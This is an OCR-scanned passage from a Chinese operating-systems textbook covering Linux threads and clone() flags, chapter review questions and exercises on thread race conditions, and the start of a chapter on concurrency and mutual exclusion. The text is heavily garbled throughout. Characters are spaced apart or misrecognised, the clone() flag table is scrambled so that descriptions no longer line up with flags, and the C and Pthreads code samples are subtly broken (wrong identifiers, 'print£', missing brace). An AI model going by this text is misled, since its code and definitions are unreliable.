4.18 Linux 进程 /线程 模型 


Linux 线程 


POSIX ( Portable Operating System based on UNIX ) 是 一 组 IEEE 应 用 程序 接口 (API) 标准 ， 其 中 包括 了 线程 
API 的 标准 。 实 现 了 POSIX 标准 的 线程 库 通 常 命名 为 Pthreads。Pthreads 在 类 UNIX 的 POSIX 标准 的 系统 中 
普遍 使 用 ， 比 如 Linux 和 Solaris。 微 软 Windows 也 实现 了 POSIX 标准 的 线程 库 。 
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内 核 级 线程 。Linux 提供 一 种 不 区 分 进程 和 线程 的 解决 方案 , 通过 使 用 一 种 类 似 于 Solaris 轻 量 级 
进程 的 方法 , 用 户 级 线程 被 映射 到 内 核 级 进程 上 。 组 成 一 个 用 户 级 进程 的 多 个 用 户 级 线程 被 映射 
到 共享 同一 组 ID 的 多 个 Linx 内 核 级 进程 上 。 这 使 得 这 些 进 程 可 以 共享 文件 和 内 存 等 资源 ， 使 
得 同一 组 中 的 进程 调度 切换 时 不 需要 切换 上 下 文 。 

在 Linux 中 通过 复制 当前 进程 的 属性 可 创建 一 个 新 进程 。 新 进程 被 克隆 出 来 ， 以 使 它 可 以 共享 
资源 ， 如 文件 、 信 和 号 处 理 程 序 和 虚 存 。 当 两 个 进程 共享 相同 虚 存 时 ， 它 们 可 以 被 当做 是 一 个 进程 中 
的 线程 。 但 是 ， 没 有 为 线程 单独 定义 数据 结构 ， 因 此 ，Linux 中 进程 和 线程 没有 区 别 。Linux 用 
clone () 命令 代替 通常 的 fork () 命令 创建 进程 。 这 个 命令 包含 了 一 组 标识 做 为 参数 ， 如 表 4.5 中 
所 定义 的 。 传 统 的 fork O 系统 调用 在 Linux 上 是 用 所 有 克隆 标志 清 零 的 clone () 系统 调用 实现 的 。 


表 4.5 Linux clone() 标 志 


CLONE_CLEARID 
CLONE_DETACHED 
CLONE_FILES 
CLONE_FS 


CLONE_IDLETASK 


CLONE_NEWNS 
CLONE_PARENT 
CLONE_PTRACE 
CLONE_SETTID 
CLONE_SETTLS 
CLONE_SIGHAND 
CLONE_SYSVSEM 


it RA 
清除 任务 标识 符 ( task id ) 
父 进 程 不 要 在 子 进程 退出 时 发 SIGCHLD 信和 号 
共享 打开 文件 表 
共享 根 目 录 和 当前 工作 目录 表 ， 而 且 共 享 产 生 新 文件 时 用 来 设 定 新 文件 属性 的 屏蔽 位 
设置 PID AF, RHE idle 任务 。 当 所 有 可 调度 的 任务 都 是 由 于 等 待 资源 而 被 挂 起 


时 ， 会 调度 idle 任务 执行 


为 子 进 程 创 建新 的 名 字 空 间 ( namespace ) 

调用 者 和 其 创建 的 任务 共享 同一 父 进程 

如 果 父 进程 被 跟踪 ， 则 子 进程 也 被 跟踪 

把 TID 写 回 用 户 空 间 

为 子 进程 创建 一 个 新 的 TLS 

共享 信号 处 理 程序 表 

共享 System V SEM_UNDO 语义 

把 此 进程 插入 父 进程 的 同一 个 线程 组 中 。 如 果 这 个 标志 为 真 ， 则 它 隐 舍 设置 了 


CLONE_THREAD 
CLONE PARENT 


如 果 设 置 此 标志 ， 则 父 进程 不 会 得 到 调度 ， 直 到 子 进程 调用 了 execve() 系 统 调用 后 ， 
父 进程 才 会 被 调度 
共享 地 址 空间 ( 内 存 描述 符 和 所 有 的 页 表 ) 

当 Linux 内 核 执行 从 一 个 进程 到 另 一 个 进程 的 切换 时 , 它 将 检查 当前 进程 的 页 目录 地 址 是 否 
和 将 被 调度 的 进程 的 相同 。 如 果 相 同 , 那么 它们 共享 同一 个 地 址 空间 , 所 以 此 时 上 下 文 切换 仅仅 
是 从 代码 的 一 处 跳 转 到 代码 的 另 一 处 。 

虽然 属于 同一 进程 组 的 被 克隆 的 进程 共享 同一 内 存 空 间 , 它们 不 能 共享 同一 个 用 户 栈 。 所 以 
clone () 调用 为 每 个 进程 创建 独立 的 栈 空 间 。 


CLONE_VFORK 


CLONE_VM 


4.7 小结 


某 些 操作 系统 区 分 进程 和 线程 的 概念 , 前 者 涉及 资源 的 所 有 权 ,， 后 者 涉及 程序 的 执行 ,这 个 
方法 可 以 使 性 能 提高 、 编 码 方便 。 在 多 线程 系统 中 , 可 以 在 一 个 进程 内 定义 多 个 并 发 线程 。 这 可 
以 通过 使 用 用 户 级 线程 或 内 核 级 线程 完成 。 用 户 级 线程 对 操作 系统 是 未 知 的 , 它们 由 一 个 在 进程 
的 用 户 空间 中 运行 的 线程 库 创建 并 管理 。 用户 级 线程 是 非常 高 效 的 , 因为 从 一 个 线程 切换 到 另 一 
个 线程 不 需要 进行 状态 切换 , 但 是 , 一 个 进程 中 一 次 只 有 一 个 用 户 级 线程 可 以 执行 , 如果 一 个 线 
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程 发 生 阻塞 ,整个 进程 都 会 被 阻塞 。 进程 内 包含 的 内 核 级 线程 是 由 内 核 维 护 的 。 由 于 内 核 认 识 它 
们 , 因而 同一 个 进程 中 的 多 个 线程 可 以 在 多 个 处 理 器 上 并 行 执行 , 一 个 线程 的 阻塞 不 会 阻塞 整个 
进程 ， 但 是 ， 当 从 一 个 线程 切换 到 另 一 个 线程 时 就 需要 进行 状态 切换 。 . 

对 称 多 处 理 是 一 种 组 织 多 处 理 器 系统 的 方法 , 它 使 得 任何 进程 (或 线程 ) 都 可 以 在 任何 处 理 
器 上 运行 ,包括 内 核 代码 和 进程 。SMP 结构 引发 了 新 的 操作 系统 设计 问题 ， 并 且 在 相似 条 件 下 ， 
可 以 比 单 处 理 器 系统 产生 更 好 的 性 能 。 

理想 情况 下 , 一 个 微 内 核 操 作 系 统 包含 一 个 非常 小 的 在 内 核 态 下 运行 的 内 核 , 这 个 内 核 只 含 
有 最 基本 、 最 关键 的 操作 系统 功能 。 其 他 的 操作 系统 功能 都 被 实现 成 在 用 户 态 下 执行 , 且 使 用 最 
基本 的 内 核 服 务 。 微 内 核 的 设计 产生 了 一 种 具有 很 高 灵活 性 和 模块 化 的 实现 方法 , 但 是 , 这 类 结 
构 仍 存在 性 能 方面 的 问题 。 


48 推荐 读物 
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49 关键 术语 、 复 习题 和 习题 


关键 术语 
内 核 级 线程 (KLT ) 多 线程 任务 
轻 量 级 进程 端口 线程 
消息 进程 用 户 级 线程 CULT) 
微 内 核 对 称 多 处 理 器 ( SMP ) 单 体 结构 的 操作 系统 
复习 题 


4.1 表 3.5 列 出 了 在 一 个 没有 线程 的 操作 系统 中 进程 控制 块 的 基本 元 素 。 对 于 多 线程 系统 ， 这 些 元 素 中 哪 
些 可 能 属于 线程 控制 块 ， 哪 些 可 能 属于 进程 控制 块 ? 
4.2 ”请 列 出 线程 间 的 状态 切换 比 进程 间 的 状态 切换 开销 更 低 的 原因 ? 
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43 
4.4 
4.5 
4.6 
4.7 
4.8 
4.9 
4.10 
4.11 
4.12 
4.13 
4.14 
4.15 


在 进程 概念 中 体现 出 的 两 个 独立 且 无 关 的 特点 是 什么 ? 

给 出 在 单 用 户 多 处 理 系统 中 使 用 线程 的 4 个 例子 。 

哪些 资源 通常 被 一 个 进程 中 的 所 有 线程 共享 ? 

列 出 用 户 级 线程 相对 于 内 核 级 线程 的 3 个 优点 。 

列 出 用 户 级 线程 相对 于 内 核 级 线程 的 两 个 缺点 。 

定义 jacketing。 

简单 定义 图 4.8 中 列 出 的 各 种 体系 结构 。 

列 出 SMP 操作 系统 的 主要 设计 问题 。 

给 出 在 典型 的 单 体 结构 操作 系统 中 可 以 找到 ， 且 可 能 是 微 内 核 操 作 系统 外 部 子 系统 的 服务 和 功能 。 
列 出 并 简单 解释 微 内 核 设计 相对 于 整体 式 结构 设计 的 7 个 优点 。 
解释 微 内 核 操作 系统 可 能 存在 的 性 能 缺点 。 

列 出 即使 在 最 小 的 微 内 核 操作 系统 中 也 可 以 找到 的 3 个 功能 。 
在 微 内 核 操作 系统 中 ， 进 程 或 线程 间 通 信 的 基本 形式 是 什么 ? 


习题 


4.1 


4.2 


4.3 


4.4 


4.5 


4.6 


考虑 以 下 事件 : 
ULT_same = 同一 进程 内 的 ULT 线程 切换 
ULT_diff= 不 同 进程 间 的 ULT 线程 切换 
KLT_same = 同一 进程 内 的 KLT 线程 切换 
KLT_diff = 不 同 进 程 间 的 KLT 线程 切换 
这 些 事件 在 开销 需求 上 有 什么 不 同 ? 将 这 些 事件 按 开销 从 小 到 大 排序 ， 并 说 明 这 样 排序 的 理由 。 
在 比较 用 户 级 线程 和 内 核 级 线程 时 ， 曾 指出 用 户 级 线程 的 一 个 缺点 是 ， 当 一 个 用 户 级 线程 执行 系统 调 
用 时 ， 不 仅 这 个 线程 被 阻塞 ， 进 程 中 的 所 有 线程 都 被 阻塞 。 请 问 这 是 为 什么 ? 
在 OS/2 中 ， 其 他 操作 系统 中 通用 的 进程 概念 被 分 成 了 三 个 不 同类 型 的 实体 : 会 话 、 进 程 和 线程 。 一 
个 会 话 是 一 组 与 用 户 接口 BA. Bad. BR) 相关 联 的 一 个 或 多 个 进程 。 会 话 代 表 了 一 个 交互 式 
的 用 户 应 用 程序 ， 如 字 处 理 程序 或 电子 表格 。 这 个 概念 使 得 PC 用 户 可 以 打开 一 个 以 上 的 应 用 程序 ， 
在 屏幕 上 显示 一 个 或 更 多 的 窗口 。 操 作 系 统 必须 知道 哪个 窗口 ， 即 哪个 会 话 是 活路 的 ， 从 而 把 键盘 和 
鼠标 的 输入 传递 给 相应 的 会 话 。 在 任何 时 刻 ， 只 有 一 个 会 话 在 前 台 模 式 ， 其 他 的 会 话 都 在 后 台 模 式 ， 
键盘 和 鼠标 的 所 有 输入 都 发 送 给 前 台 会 话 的 一 个 进程 。 当 一 个 会 话 在 前 台 模 式 时 ， 执 行 视频 输出 的 进 
程 直接 把 它 发 送 到 硬件 视频 缓冲 区 ， 然 后 到 用 户 的 屏幕 ; 当 这 个 会 话 移 到 后 台 时 ， 硬 件 视频 缓冲 区 被 
保存 到 一 个 逻辑 视频 缓冲 区 。 当 一 个 会 话 在 后 台 时 ， 如 果 该 会 话 的 任何 一 个 进程 的 任何 一 个 线程 正在 
执行 并 产生 屏幕 输出 ， 这 个 输出 被 送 到 逻辑 视频 缓冲 区 ; 当 这 个 会 话 返回 前 台 时 ， 屏 幕 被 更 新 ， 为 新 
的 前 台 会 话 显示 出 逻辑 视频 缓冲 区 中 的 当前 内 容 。 

有 一 种 方法 可 以 把 OS/2 中 与 进程 相关 的 概念 的 数目 从 3 个 减少 到 2 个 : 删 去 会 话 ， 把 用 户 接 口 
( 键盘 、 显 示 器 、 鼠 标 ) 和 进程 关联 起 来 。 这 样 ， 在 某 一 时 刻 ， 只 有 一 个 进程 处 于 前 台 模 式 。 为 了 进 
一 步 结构 化 ， 进 程 可 以 被 划分 成 线程 。 
a) 使 用 这 种 方法 会 南 失 什么 优点 ? 
b) 如 果 将 这 种 修改 方法 深入 下 去 ， 应 该 在 哪里 分 配 资源 (内存 、 文 件 等 )， 在 进程 级 还 是 在 线程 级 ? 
考虑 这 样 一 个 环境 ,用 户 级 线程 和 内 核 级 线程 呈 一 对 一 的 映射 关系 , 并 且 人 允许 进程 中 的 一 个 或 多 个 线 
程 产 生 会 引发 阻塞 的 系统 调用 ， 而 其 他 线程 可 以 继续 运行 。 解 释 为 什么 在 单 处 理 器 机 器 上 ， 这 个 模型 
可 以 使 多 线程 程序 比 相应 的 单线 程 程序 运行 速度 更 快 。 
a) 为 什么 说 线程 与 进程 相 比 是 轻 量 级 的 ? 
b ) 与 使 用 不 含 线程 的 进程 相 比 ， 列 出 使 用 包含 线程 的 进程 的 3 个 好 处 。 
c) 进程 退出 会 导致 这 个 进程 拥有 的 所 有 线程 都 退出 吗 ? 解释 原因 。 
OS/390 大 型 机 操作 系统 围绕 着 地 址 空间 和 任务 的 概念 构造 。 粗 略 说 来 ， 一 个 地 址 空间 对 应 于 一 个 应 
用 程序 , 并 且 或 多 或 少 地 对 应 于 其 他 操作 系统 中 的 一 个 进程 ; 在 一 个 地 址 空间 中 , 可 以 产生 一 组 任务 ， 
并 且 它 们 可 以 并 发 执行 ， 这 大 致 对 应 于 多 线程 的 概念 。 有 两 个 数据 结构 对 管理 任务 结构 起 关键 作用 。 
地 址 空间 控制 块 (ASCB ) 含有 OS/390 所 需要 的 关于 一 个 地 址 空间 的 信息 ， 而 不 论 该 地 址 空间 是 否 正 
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在 执行 。ASCB 中 的 信息 包括 分 派 优先 级 、 分 配给 该 地 址 空间 的 实 存 和 虚 存 、 该 地 址 空间 中 就 绪 的 任 

务 数 以 及 每 一 个 是 否 被 换 出 。 一 个 任务 控制 块 (TCB) 表示 一 个 正在 执行 的 用 户 程序 ， 它 含有 在 一 个 

地 址 空间 中 管理 该 任务 所 需要 的 信息 ， 包 括 处 理 器 状态 信息 、 指 向 该 任务 所 涉及 的 程序 的 指针 和 任务 

执行 状态 。ASCB 是 在 系统 内 存 中 保存 的 全 局 结构 ， 而 TCB 是 保存 在 各 自 的 地 址 空间 中 的 局 部 结构 。 

请 问 把 控制 信息 划分 成 全 局 和 局 部 两 部 分 有 什么 好 处 ? 

4.7 一 个 多 处 理 器 系统 有 8 个 处 理 器 ， 并 配备 了 20 个 磁带 设备 。 现 有 大 量 的 作业 提交 给 该 系统 ， 完 成 每 
个 作业 最 多 需要 4 个 磁带 设备 。 假 设 每 个 作业 开始 运行 时 只 需要 3 个 磁带 设备 ， 并 且 在 很 长 时 间 内 都 
只 需要 这 3 个 设备 ,而 只 是 在 最 后 很 短 的 一 段 时 间 内 需要 第 4 个 设备 以 完成 操作 。 同 时 还 假设 这 类 作 
业 源 源 不 断 。 

a) 假设 操作 系统 中 的 调度 程序 只 有 当 4 个 磁带 设备 都 可 用 时 才 开 始 一 个 作业 。 当 作业 开始 时 ，4 个 设 
备 立即 被 分 配给 它 ， 并 且 直 到 作业 完成 时 才 被 释放 。 请 问 一 次 最 多 可 以 同时 执行 几 个 作业 ? 采用 
这 种 策略 ， 最 多 有 几 个 磁带 设备 可 能 是 空闲 的 ? 最 少 有 几 个 ? 

b) 给 出 另外 一 种 策略 ， 要 求 其 可 以 提高 磁带 设备 的 利用 率 ， 并 且 同 时 可 以 避免 系统 死 锁 。 并 分 析 最 
多 可 以 有 几 个 作业 同时 执行 ， 可 能 出 现 的 空闲 设备 的 范围 是 多 少 。 

48 很 多 诸如 C 和 C++ 语言 的 现行 规范 中 , 并 没有 提供 对 多 线程 编程 的 支持 。 如 下 面 程序 所 示 , 这 一 问题 
可 能 会 对 编译 器 和 代码 正确 性 造成 影响 。 考 虑 如 下 的 函数 定义 和 声明 : 
int global positives = 0; 
typedef struct list { 

struct list *next; 
double val; 

} * list; 


void count_positives(list 1) 


{ 
list p; 
for (p = 1; p; p = p -> next) 
if (p -> val > 0.0) 
++global_ positives; 


} 
考虑 : 当 一 个 线程 A 执行 如 下 操作 
count _positives(<list containing only negative values>); 
的 同时 ， 另 一 个 线程 B 执行 
++global positives; 
a) 该 晒 数 的 功能 是 什么 ? 
b) C 语言 只 对 单个 线程 的 执行 进行 了 规范 。 对 于 本 题 中 所 声明 的 函数 ， 在 两 个 并 发 的 线程 中 使 用 是 
否 会 有 明显 或 潜在 的 问题 ? 
49 ”对 于 一 些 已 经 包含 了 优化 的 编译 器 ( 包括 比较 保守 的 GCC )， 上 题 中 的 count positives 函数 一 般 会 被 
优化 成 类 似 下 面 的 代码 : 


void count_positives(list 1) 
{ 
list p; 
register int r; 
r = global_positives; 
for (p = l; p; p= p -> next) 
if (p -> val > 0.0) ++r; 
global_positives = r; 
} 
如 果 有 A、B 两 个 线程 并 发 执行 ， 被 这 样 编译 优化 过 的 代码 会 有 什么 明显 或 潜在 的 问题 发 生 ? 
4.10 考虑 下 列 使 用 了 POSIX Pthreads API 的 代码 : 
thread2.c 
#include <pthread.h> 
#include <stdlib.h> 
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4.11 


4.12 





#include <unistd.h> 
#include <stdio.h> 
int myglobal; 
void *thread_function(void *arg) { 
int i,j; 
for ( i=0; i<20; i++ ) { 
j=myglobal; 
j=j+1; 
print£("."); 
fflush (stdout); 
sleep(1); 
myglobal=j; 
} 


return NULL; 


} 


int main(void) { 
pthread_t mythread; 
int i; 
if ( pthread_create( &mythread, NULL, thread_function, NULL)) 


{ 


printf ("error creating thread."); 
abort (); 


} 
for ( i=0; i<20; i++) { 
myglobal=myglobal+1; 
printf("o"); 
fflush (stdout); 
sleep (1); 


} 

if ( pthread join ( mythread, NULL ) ) { 
printf ("error joining thread."); 
abort () ; 


} 


printf ("\nmyglobal equals %d\n",myglobal) ; 
exit (0); 


aain0 中 首先 声明 了 一 个 变量 mythread ， 类 型 为 pthread t， 它 是 一 个 线程 的 id; 然后 ， 计 语句 创建 了 
一 个 与 mythread 关联 的 线程 。 调 用 pthread_create()， 若 成 功 ， 返 回 0; 失败 返回 非 零 值 。pthread_ 
create() 的 第 三 个 参数 是 一 个 新 线程 开始 时 将 执行 的 函数 名 ， 当 thread_function() 返 回 时 ， 线 程 终止 。 
此 时 主 程序 本 身 定 义 了 一 个 线程 ,所 以 有 两 个 线程 在 执行 。 消 数 pthread join 允许 主线 程 等 待 直到 新 
的 线程 结束 。 

a) 这 个 程序 完成 的 功能 是 什么 ? 

b) 程序 执行 的 输出 如 下 : 


$ ./thread2 
~-O.0.0.0.00.0.0.0.0.0.0.0.0.0..0.90.0.0.0 
myglobal equals 21 
这 一 输出 结果 是 否 是 所 期 望 的 ? 如 果 不 是 ， 什 么 地 方 出 错 了 ? 
Solaris 资料 表明 ， 一 个 用 户 级 线程 可 能 让 位 于 具有 相同 优先 级 的 另 一 个 线程 。 请 问 ， 如 果 有 一 个 可 运 
行 的 、 具 有 更 高 优先 级 的 线程 ， 让 位 函数 是 否 还 会 导致 让 位 于 具有 相同 优先 级 或 更 高 优先 级 的 线程 ? 
在 Solaris 9 和 Solaris10 P, ULT 和 LWP 之 间 是 一 一 映射 的 。 在 Solaris 8 中 ,单个 LWP 可 以 支持 一 
个 或 多 个 ULT。 
a) ULT 到 LWP 的 多 对 一 映射， 可 能 的 好 处 是 什么 ? 
b) Solaris 8 中 ， 一 个 ULT 的 线程 执行 状态 不 同 于 LWP， 请 解释 一 下 为 什么 ? 
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c) 图 4.19 给 出 了 在 Solaris 8 和 9 H, ULT 以 及 ES LWP 的 状态 转换 图 。 请 解释 图 中 的 操作 
和 两 个 图 的 关系 。 








图 4.19 Solaris 用 户 级 线程 和 轻 量 级 进程 状态 
4.13 ULT 或 KLT 中 ， 哪 一 种 线程 不 能 利用 多 个 处 理 器 ? 请 给 出 理由 。 


AST 并 发 性 : 互 斥 和 同步 


操作 系统 设计 中 的 核心 问题 是 关于 进程 和 线程 的 管理 : 

@ 多 道 程序 设计 技术 : 管理 单 处 理 器 系统 中 的 多 个 进程 。 

@ 多 处 理 技术 : 管理 多 处 理 器 系统 中 的 多 个 进程 。 

多 分 布 式 处 理 技术 : 管理 多 台 分 布 式 计算 机 系统 中 多 个 进程 的 执行 。 最 近 迅 猛 发 展 的 集群 

就 是 这 类 系统 的 典型 的 例子 。 

并 发 是 所 有 问题 的 基础 ， 也 是 操作 系统 设计 的 基础 。 并 发 包括 很 多 设计 问题 , 其 中 有 进程 间 
通信 、 资 源 共 享 与 竞争 (例如 内 存 、 文 件 、LO 访问 )、 多 个 进程 活动 的 同步 以 及 分 配给 进程 的 
处 理 器 时 间 等 。 我 们 将 会 看 到 这 些 问题 不 仅 会 出 现在 多 处 理 环境 和 分 布 式 处 理 环境 中 , 甚至 也 会 
“出 现在 单 处 理 器 的 多 道 程序 设计 系统 中 。 

并 发 会 在 以 下 三 种 不 同 的 上 下 文中 出 现 : 

© 多 个 应 用 程序 : 多 道 程序 设计 技术 允许 在 多 个 活动 的 应 用 程序 间 动 态 共 享 处 理 器 时 间 。 

© 结构 化 应 用 程序 : 作为 模块 化 设计 和 结构 化 程序 设计 的 扩展 ,一 些 应 用 程序 可 以 被 有 效 

地 设计 成 一 组 并 发 进程 。 

@ 操作 系统 结构 : 同样 的 结构 化 程序 设计 优点 可 用 于 系统 程序 员 ， 我 们 已 经 知道 操作 系统 

自身 常常 作为 一 组 进程 或 线程 实现 。 

由 于 并 发 相当 重要 , 本 书 有 4 章 的 内 容 和 一 个 附录 都 着 重 讲述 与 并 发 相关 的 问题 。 本章 和 下 
一 章 涉及 多 道 程序 设计 和 多 处 理 器 系统 中 的 并 发 性 ,第 16 章 和 第 18 章 讲述 与 分 布 式 处 理 器 相关 
的 并 发 问题 。 尽管 本 书 的 其 余部 分 包含 操作 系统 设计 的 很 多 重要 的 其 他 主题 , 但 是 并 发 将 在 这 些 
主题 中 扮演 重要 的 角色 。 

本 章 首先 介绍 并 发 的 概念 和 多 个 并 发 进程 执行 的 含义 9 。 我 们 发 现 ， 支 持 并 发 进程 的 基本 要 求 是 
加 强 互 斥 的 能 力 ; 也 就 是 说 ， 当 一 个 进程 被 授予 互 斥 能 力 时 ， 那 么 在 其 活动 期 间 ， 它 具有 排斥 所 有 其 
他 进程 的 能 力 。 接 下 来 ,将 介绍 支持 互 斥 的 硬件 机 制 。 随 后 将 介绍 一 些 不 需要 忙 等 待 ， 可 由 操作 系统 
或 语言 编译 器 支持 的 互 斥 解决 方案 。 这 里 将 讨论 三 种 方法 : 信号 量 、 管 程 和 消息 传递 。 

本 章 通 过 两 个 经 典 的 并 发 问题 来 说 明 并 发 的 概念 ,并 对 本 章 中 使 用 的 各 种 方法 进行 比较 。 在 
53 节 中 将 介绍 一 个 可 运行 的 例子 一 一 生产 者 /消费 者 问题 ， 并 以 读者 / 写 者 问题 作为 本 章 的 结束 。 
第 6 章 将 继续 讨论 并 发 问题 ， 实 例 系 统 中 的 并 发 机 制 将 推迟 到 第 6 章 末 讲述 。 附 录 A 涵盖 了 与 
并 发 相关 的 其 他 主题 。 

R 5.1 列 出 了 一 些 和 并 发 相关 的 关键 术语 。 


表 5.1 和 并 发 相关 的 关键 术语 













一 个 或 多 个 指令 的 序列 ， 对 外 是 不 可 分 的 ， 即 没有 其 他 进程 可 以 看 到 其 中 间 状 态 或 者 中 断 此 操作 
是 一 段 代码 ， 在 这 段 代 码 中 进程 将 访问 共享 资源 ， 当 另外 一 个 进程 已 经 在 这 段 代码 中 运行 时 ， 这 个 
进程 就 不 能 在 这 段 代码 中 执行 





临界 区 








O 为 简单 起 见 ， 我 们 通常 指 的 是 进程 的 并 发 执行 。 实 际 上 ， 正 如 在 前 一 章 中 所 看 到 的 那样 ， 在 某 些 系 统 中 ， 并 
发 的 基本 单元 是 线程 而 不 是 进程 。 
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( 续 ) 















说 明 

两 个 或 两 个 以 上 的 进程 因 其 中 的 每 个 进程 都 在 等 待 其 他 进程 做 完 某 些 事情 而 不 能 继续 执行 ， 这样 的 
情形 叫做 死 锁 

两 个 或 两 个 以 上 进程 为 了 响应 其 他 进程 中 的 变化 而 持续 改变 自己 的 状态 但 不 做 有 用 的 工作 ， 这样 的 
情形 叫做 活 锁 

当 一 个 进程 在 临界 区 访问 共享 资源 时 ， 其 他 进程 不 能 进入 该 临界 区 访问 任何 共享 资源 ， 这 种 情形 叫 
做 互 斥 
多 个 线程 或 者 进程 在 读 写 一 个 共享 数据 时 ， 结 果 依赖 于 它们 执行 的 相对 时 间 ， 这 种 情形 叫做 竞争 
是 指 一 个 可 运行 的 进程 尽管 能 继续 执行 ， 但 被 调度 器 无 限期 地 忽视 ， 而 不 能 被 调度 执行 的 情况 


5.1 并 发 的 原理 


在 单 处理 器 多 道 程序 设计 系统 中 ， 进 程 交 蔡 执行 ， 表 现 出 一 种 同时 执行 的 外 部 特征 ， 如 图 
2.12a 所 示 。 即 使 不 能 实现 真正 的 并 行 处 理 ， 并 且 在 进程 间 来 回 切换 也 需要 一 定 的 开销 ， 交 蔡 执 
行 在 处 理 效率 和 程序 结构 上 还 是 带 来 了 重要 的 好 处 ,在 多 处 理 器 系统 中 ,不 仅 可 以 交替 执行 进程 ， 
而 且 可 以 重 赤 执行 进程 ， 如 图 2.12b 所 示 。 

从 表面 上 看 , 交替 和 重要 代表 了 完全 不 同 的 执行 模式 和 不 同 的 问题 。 实 际 上 , 这 两 种 技术 都 
可 以 看 做 是 并 发 处 理 的 一 个 实例 , 并 且 都 代表 了 同样 的 问题 。 在 单 处理 器 的 情况 下 , 这些 问题 源 
于 多 道 程序 设计 系统 的 一 个 基本 特性 :进程 的 相对 执行 速度 不 可 预测 , 它 取 决 于 其 他 进程 的 活动 、 
操作 系统 处 理 中 断 的 方式 以 及 操作 系统 的 调度 策略 。 这 就 带 来 了 下 列 困 难 : 

1 ) 全 局 资源 的 共享 充满 了 危险 。 例 如 ， 如 果 两 个 进程 都 使 用 同一 个 全 局 变量 ,并且 都 对 该 

变量 执行 读 写 操作 ， 那 么 不 同 的 读 写 执行 顺序 是 非常 关键 的 。 关 于 这 个 问题 的 例子 将 在 
下 一 小 节 中 给 出 。 

2) 操作 系统 很 难 对 资源 进行 最 优化 分 配 。 例 如 ， BEE A 可 能 请 求 使 用 一 个 特定 的 IO 通道 ， 
并 获得 了 控制 权 , 但 它 在 使 用 这 个 通道 前 被 挂 起 了 ， 操 作 系统 仍然 锁定 这 个 通道 ， 以 防止 
其 他 进程 使 用 ， 这 是 难以 令 人 满意 的 。 事 实 上 ， 这 种 情况 有 可 能 导致 死 锁 ， 详 见 第 6 章 。 

3 ) 定位 程序 设计 错误 是 非常 困难 的 。 这 是 因为 结果 通常 是 不 确定 的 和 不 可 再 现 的 ( 有关 讨 
论 详 见 [ LEBL87, CARR89 和 SHENO2 ] )。 

上 述 的 所 有 困难 在 多 处 理 器 系统 中 也 有 表现 ,因为 在 这 样 的 系统 中 进程 执行 的 相对 速度 同样 
是 不 可 预测 的 。 多 处 理 器 系统 还 必须 处 理 多 个 进程 同时 执行 所 引发 的 问题 ,从 根本 上 来 说 , 这 些 
问题 和 单 处 理 器 系统 中 的 是 相同 的 ， 随 着 讨论 的 深入 这 些 问题 将 逐渐 明了 。 


5.1.1 一 个 简单 的 例子 
考虑 下 面 的 过 程 : 


void echo() 
{ 

































chin = getchar (); 
chout = chin; 
putchar (chout); 


这 个 过 程 显示 了 字符 回 显 程序 的 基本 步骤 ,每 当 击 下 键 ,就 可 从 键盘 获得 输入 每 个 输入 
字符 就 保存 在 变量 chin 中 ， 然 后 传送 给 变量 chout ， 并 回 送 给 显示 器 。 任 何 程 序 可 以 重复 地 
调用 这 个 过 程 ， 接 收 用 户 输入 ， 并 在 屏幕 上 显示 。 

现在 考虑 一 个 支持 单 用 户 的 单 处 理 器 多 道 程 序 设计 系统 ,用户 可 以 从 一 个 应 用 程序 切换 到 另 
一 个 应 用 程序 , 每 个 应 用 程序 都 使 用 同一 个 键盘 进行 输入 , 使 用 同一 个 屏幕 进行 输出 。 由 于 每 个 
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应 用 程序 都 需要 使 用 这 个 过 程 echo， 所 以 它 就 被 当做 是 一 个 共享 过 程 ， 载 人 到 所 有 应 用 程序 公 
用 的 全 局 存储 区 中 。 因 此 ， 只 需 使 用 echo 过 程 的 一 个 副本 ， 从 而 节省 了 空间 。 
在 进程 间 共 享 内 存 是 非常 有 用 的 , 它 允 许 进 程 间 有 效 而 紧密 的 交互 。 但 是 , 这 种 共享 也 可 能 
会 带 来 一 些 问 题 。 考 虑 下 面 的 顺序 ; 
1) 进程 Pl 调用 echo 过 程 ， 并 在 getchar 返回 它 的 值 以 及 将 该 值 存储 于 chin 后 立即 被 
中 断 ， 此 时 ， 最 近 输 入 的 字符 x 保存 在 变量 chin o l 

2) 进程 P2 被 激活 并 调用 echo 过 程 echo 过 程 运行 得 出 结果 ， 输 入， 然后 在 屏幕 上 显示 
单个 的 字符 y。 

3) 进程 P1 被 恢复 。 此 时 chin 中 的 值 x 被 写 覆 盖 , 因此 已 丢失 , 而 chin 中 的 值 y 被 传送 
给 chout 并 显示 出 来 。 

Ault, 第 一 个 字符 丢失 ， 第 二 个 字符 被 显示 了 两 次 ,问题 的 本 质 在 于 共享 全 局 变量 chin, 
多 个 进程 访问 这 个 全 局 变量 , 如果 一 个 进程 修改 了 它 , 然后 被 中 断 , 那么 另 一 个 进程 可 能 在 第 一 
个 进程 使 用 它 的 值 之 前 又 修改 了 这 个 变量 。 假设 在 这 个 过 程 中 一 次 只 可 以 有 一 个 进程 , 那么 前 面 
的 顺序 会 产生 如 下 结果 

1 ) 进程 P1 调用 echo 过 程 ， 并 在 输入 函数 取得 结果 后 立即 被 中 断 ， 此 时 ， 最 近 输 入 的 字符 

x 保存 在 变量 chin 中 。 
2) 进程 P2 被 激活 并 调用 echo 过 程 。 但是， 由 于 P1 仍然 在 echo 过 程 中 , 尽管 当前 P1 处 
于 挂 起 状态 , P2 仍 被 阻塞 , 不 能 进入 这 个 过 程 。 因 此, P2 被 挂 起 , SH echo 过 程 可 用 。 

3) 一 段 时 间 后 ， 进 程 Pl 被 恢复 ， 完 成 echo 的 执行 ， 并 显示 出 正确 的 字符 x 

4) 当 P1l 退出 echo 后 ， 解 除了 对 P2 的 阻塞 ，P2 被 恢复 ， 成 功 地 调用 echo 过 程 。 

这 个 例子 说 明 ， 如 果 需 要 保护 共享 的 全 局 变量 ( 以 及 其 他 共享 的 全 局 资源 )， 唯 一 的 办 法 是 
控制 访问 该 变量 的 代码 。 如 果 我 们 定义 了 一 条 规则 ， 一 次 只 允许 一 个 进程 进入 eehe， 并 且 只 有 
在 echo 过 程 运行 结束 后 它 才 对 另 一 个 进程 是 可 用 的 ， 那 么 刚才 讨论 的 那 类 错误 就 不 会 发 生 了 。 
如 何 实施 此 规则 是 本 章 的 重要 内 容 。 

在 阐述 这 个 问题 前 , 首先 假设 在 单 处 理 器 多 道 程序 设计 系统 中 , 通过 以 上 例子 可 以 说 明 即 使 
只 有 一 个 处 理 器 也 有 可 能 产生 并 发 问题 。 在 多 处 理 器 系统 中 ， 同 样 也 存在 保护 共享 资源 的 问题 ， 
